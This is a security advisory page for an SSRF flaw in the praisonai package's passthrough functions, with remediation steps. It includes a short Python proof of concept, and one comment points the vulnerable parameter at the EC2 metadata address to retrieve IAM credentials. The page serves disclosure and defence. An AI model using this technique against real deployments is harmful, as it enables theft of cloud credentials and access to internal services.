Python CVE-2026-34936
HIGH
GHSA-x6m9-gxvr-7jpv
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Lifecycle Timeline
3DescriptionNVD
Summary
passthrough() and apassthrough() in praisonai accept a caller-controlled api_base parameter that is concatenated with endpoint and passed directly to httpx.Client.request() when the litellm primary path raises AttributeError. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server.
Details
passthrough.py:92 (source) -> passthrough.py:109 (fallback trigger) -> passthrough.py:110 (sink)
# source -- api_base taken directly from caller
def passthrough(endpoint, api_base=None, method="GET", ...):
# fallback trigger -- AttributeError from unrecognised provider enters fallback
except AttributeError:
url = f"{api_base or 'https://api.openai.com'}{endpoint}"
# sink -- no validation before request
response = client.request(method, url=url, ...)PoC
# tested on: praisonai 1.5.87 (source install)
# install: pip install -e src/praisonai
# start listener: python3 -m http.server 8888
import sys, litellm
sys.path.insert(0, 'src/praisonai')
del litellm.llm_passthrough_route
from praisonai.capabilities.passthrough import passthrough
result = passthrough(
endpoint="/ssrf-test",
api_base="http://127.0.0.1:8888",
method="GET",
custom_llm_provider="__nonexistent__",
)
print(result)
# expected output: PassthroughResult(data='...', status_code=404, headers={'server': 'SimpleHTTP/0.6 Python/3.12.3', ...})
# listener logs: "GET /ssrf-test HTTP/1.1" 404
# on EC2 with IMDSv1: api_base="http://169.254.169.254" returns IAM credentialsImpact
On cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service. Internal services (Redis, Elasticsearch, Kubernetes API) are reachable without authentication from within the VPC. The Flask API server deploys with AUTH_ENABLED = False by default, making this reachable over the network without credentials.
AnalysisAI
Server-Side Request Forgery in PraisonAI's passthrough API allows authenticated remote attackers to access internal cloud metadata services and private network resources. The vulnerability affects the praisonai Python package where the passthrough() and apassthrough() functions accept unvalidated caller-controlled api_base parameters that are directly concatenated and passed to httpx requests. …
Sign in for full analysis, threat intelligence, and remediation guidance.
RemediationAI
Within 24 hours: Identify all deployments of PraisonAI Python package and audit AUTH_ENABLED configuration settings; disable passthrough() and apassthrough() API endpoints immediately or restrict network access via firewall rules to trusted sources only. Within 7 days: Conduct forensic review of API logs for unauthorized api_base parameter usage; rotate any exposed EC2 IAM credentials and review CloudTrail logs for suspicious metadata service access; implement network segmentation to prevent internal service access from PraisonAI processes. …
Sign in for detailed remediation steps.
More from same product – last 7 days
Blind Server-Side Request Forgery in FlaskBB's avatar URL handling allows any authenticated user to force the server to
Stored HTML injection in Kibana allows a low-privileged authenticated user with write access to an Elasticsearch index t
Share
External POC / Exploit Code
Leaving vuln.today